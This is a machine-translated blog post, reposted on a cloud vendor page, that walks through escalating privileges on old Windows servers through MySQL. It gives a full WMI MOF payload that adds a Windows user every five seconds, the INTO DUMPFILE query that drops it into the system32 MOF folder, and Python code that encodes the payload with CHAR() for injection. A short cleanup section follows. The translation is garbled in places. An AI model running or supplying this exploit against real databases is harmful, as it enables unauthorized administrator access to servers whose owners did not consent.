A study on the rights of MySQL MOF

Source: Internet
Author: User
Tags sql injection mysql login

Inadvertently see the right way about MySQL, while there is free time to study up, found that there are quite a lot of places on the internet is not detailed enough, the study time also stuck for a while.


Usage Prerequisites:

    1. Operating system for Windows

    2. Operating system version should not be too high, 2008 test does not pass, 2003 can (because need to access to the directory in System32) or the MySQL boot identity has permission to access and write to the C:/windows/system32/mof directory

    3. The database is MySQL and knows the MySQL login password and allows the external connection (or the presence of SQL injection or Webshell operation, not practiced)


Let's start with a brief introduction (excerpt from the Internet and personal practice)

Placed in c:/windows/system32/ The Nullevt.mof file in the MOF directory is automatically executed and disappears every five seconds, and if no new file is created in the future, the contents of the previous nullevt.mof are cycled every five seconds, so only the malicious code needs to be written to the file.


Use code in public nullevt.mof online

#pragma namespace ("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter {eventnamespace = "root\\cimv2 ”; Name = "FiltP2"; Query = "SELECT * from __InstanceModificationEvent" "Where targetinstance Isa \" Win32_localtime\ "" and targetinstance.se cond = 5 "; QueryLanguage = "WQL";}; Instance of Activescripteventconsumer as $Consumer {Name = "consPCSV2"; Scriptingengine = "JScript"; ScriptText = "var WSH = new ActiveXObject (\" Wscript.shell\ ") \nwsh.run (\" Net.exe user xxx xxx/add\ ")";}; Instance of __filtertoconsumerbinding{consumer = $Consumer; Filter = $EventFilter;};


The general use process steps are as follows:

    1. Upload the file to any location on the server, any name

    2. Via MySQL statement select Load_file (uploaded file path) into DumpFile ' C:/windows/system32/mof/nullevt.mof '

Then, if a successful upload, after a period of time, the embedded code inside will be executed


Personally think to upload files appear too troublesome, can directly select ' xxxxx ' into, after the attempt, to transcode the content after the query can be, provide part of the PY code as a demonstration

Using the char function in MySQL to solve

Payload = r ' #pragma  namespace ("\\\\.\\root\\subscription") instance of __eventfilter  as  $EventFilter  { EventNamespace =  "root\\cimv2"; name =  "filtP2 "; query = " select * from __instancemodificationevent  " " Where  Targetinstance isa \ "win32_localtime\"   " " and targetinstance.second = 5 ";  QueryLanguage =  "WQL";  };instance of activescripteventconsumer as $ consumer { name =  "consPCSV2"; scriptingengine =  "JScript";  scripttext  =  "Var wsh = new activexobject (\" Wscript.shell\ ") \nwsh.run (\" Net.exe user  xxxx xxx /add\ ")";  };instance of __filtertoconsumerbinding { consumer  =  $Consumer; filter =  $EventFilter; }; " ascii_payload =  ' FOR EACH_CHR IN&NBsp;payload:    ascii_payload += str (Ord (EACH_CHR))  +  ', ' ascii_payload  = ascii_payload[:-1]cur = conn.cursor () sql =  "Select char (%s)  into  dumpfile  ' c:/windows/system32/wbem/mof/nullevt.mof '  % ascii_payloadcur.execute (SQL)


Since MOF is performed by the system, permissions are sufficient to create a user, add an administrator, and so on, to complete the process of extracting power.

If the server discovers that the MOF is being used to raise the rights, how can the user be resolved to create loops?

Open cmd using the following command

net stop WinMgmt

Delete the contents of the folder C:/windows/system32/wbem/repository

net start WinMgmt

Can


Where the error is, please correct it.

This article is from the "z2p blog" blog, make sure to keep this source http://z2ppp.blog.51cto.com/11186185/1975985

A study on the rights of MySQL MOF

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.